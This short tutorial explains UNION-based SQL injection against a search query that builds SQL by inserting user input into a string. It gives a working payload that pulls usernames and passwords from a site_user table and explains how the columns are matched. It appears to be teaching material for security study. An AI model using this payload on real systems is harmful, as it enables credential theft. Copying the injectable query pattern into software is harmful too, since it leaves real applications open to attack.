### SQL injection using UNION

**UNION** keyword allows to combine multiple tables, no matter the table in the original query.
The only things to take into account are the number and the types of columns in the original query (they must match).

For example, if the original query is `` `SELECT * FROM commodity WHERE name_commodity ILIKE '%${searchTerm}%'`  ``, then we can first try to determine the number of selected columns by trial and error.

Example of a search term to select data from user table: ``
f' UNION SELECT id_site_user, CONCAT(username, ' ', user_pass), 1 FROM site_user--
``

This will result in the following query:

```postgres-sql
SELECT * FROM commodity WHERE name_commodity ILIKE '%f' UNION SELECT id_site_user, CONCAT(username, ' ', user_pass), 1 FROM site_user--%'
```

Note how we used `SELECT CONCAT(username, ' ', user_pass)` to select 2 text columns from `site_user`, since `commodity` has only 1 text column. At the same time, we used `SELECT 1` to match the number of columns. Finally, we ended our string with a -- to comment out the rest of the original query and avoid syntax errors.